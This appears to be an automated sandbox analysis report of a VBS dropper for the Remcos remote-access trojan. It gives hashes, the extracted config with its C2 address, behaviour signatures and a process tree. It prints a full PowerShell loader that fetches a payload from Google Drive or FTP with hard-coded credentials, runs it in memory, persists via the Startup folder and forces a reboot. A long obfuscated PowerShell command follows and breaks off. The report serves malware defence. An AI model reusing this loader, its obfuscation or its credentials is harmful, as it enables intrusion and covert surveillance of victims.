Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/10/2024, 01:39 UTC

General

  • Target

    7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs

  • Size

    591KB

  • MD5

    9b36a3c24abb6bc8694e48e0c101c416

  • SHA1

    6fd1c1c65d63f349734f2efcce64c88b3efd5e45

  • SHA256

    7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15

  • SHA512

    e22e5725ff50239c8df0ea9010ea389bdd79392dbcf01d65c9af5a32fd0084f501db879fcee5dfee0a2d02c9626d7d8f61abb240189d9fcf6ae00b1602298f64

  • SSDEEP

    1536:rcccccccccccccccccq99999999999999999999999999999999999999999999n:J

Malware Config

Extracted

Language
ps1
Source
1
; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    developerpro21578Jp@@

Extracted

Family

remcos

Botnet

NedDay

C2

212.162.149.163:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    1210

  • mouse_option

    false

  • mutex

    Rmc-52K54M

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 